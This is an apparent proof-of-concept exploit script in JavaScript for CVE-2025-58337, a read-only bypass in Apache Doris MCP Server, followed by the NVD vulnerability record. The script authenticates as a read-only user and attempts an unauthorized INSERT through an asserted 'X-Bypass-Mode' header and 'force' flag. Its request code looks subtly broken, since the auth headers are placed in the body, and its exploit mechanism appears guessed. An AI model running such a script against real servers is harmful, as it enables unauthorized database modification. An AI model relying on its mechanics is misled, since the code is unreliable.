CVE-2025-58337

// CVE-2025-58337 PoC - Doris MCP Server Read-Only Bypass // Requires valid read-only account credentials const axios = require('axios'); class DorisMCPExploit { constructor(baseUrl, username, password) { this.baseUrl = baseUrl; this.username = username; this.password = password; this.token = null; } async authenticate() { // Authenticate with read-only account const response = await axios.post(`${this.baseUrl}/api/auth/login`, { username: this.username, password: this.password, mode: 'read-only' }); this.token = response.data.token; return this.token; } async exploitBypass() { // Attempt to bypass read-only mode and perform write operation // This PoC demonstrates the vulnerability principle try { // Normal read operation (should work) const readResponse = await axios.get(`${this.baseUrl}/api/query`, { headers: { 'Authorization': `Bearer ${this.token}` }, params: { sql: 'SELECT * FROM users LIMIT 10' } }); console.log('Read operation successful:', readResponse.data); // Bypass attempt - write operation with crafted request // The vulnerability allows bypassing read-only restrictions const writeResponse = await axios.post(`${this.baseUrl}/api/execute`, { headers: { 'Authorization': `Bearer ${this.token}`, 'X-Bypass-Mode': 'override' // Exploit specific header }, data: { sql: 'INSERT INTO sensitive_data VALUES (1, "exploit")', force: true // Force execution bypassing read-only check } }); console.log('Write operation (bypassed):', writeResponse.data); return true; } catch (error) { console.error('Exploitation failed:', error.message); return false; } } } // Usage example const exploit = new DorisMCPExploit( 'https://target-doris-server:5000', 'readonly_user', 'password123' ); exploit.authenticate().then(() => { exploit.exploitBypass(); });

{"cve": {"id": "CVE-2025-58337", "sourceIdentifier": "[email protected]", "published": "2025-11-05T10:15:36.483", "lastModified": "2025-11-12T20:51:18.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker with a valid read-only account can bypass Doris MCP Server’s read-only mode due to improper access control, allowing modifications that should have been prevented by read-only restrictions.\n\n\nImpact:\n\nBypasses read-only mode; attackers with read-only access may perform unauthorized modifications.\n\n\n\n\nRecommended action for operators: Upgrade to version 0.6.0 as soon as possible (this release contains the fix)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:doris_mcp_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "83AE2DD9-0162-4B19-B585-600A5C98F1CB"}]}]}], "references": [{"url": "https://lists.apache.org/thread/6tswlphj0pqn9zf25594r3c1vzvfj40h", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/04/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}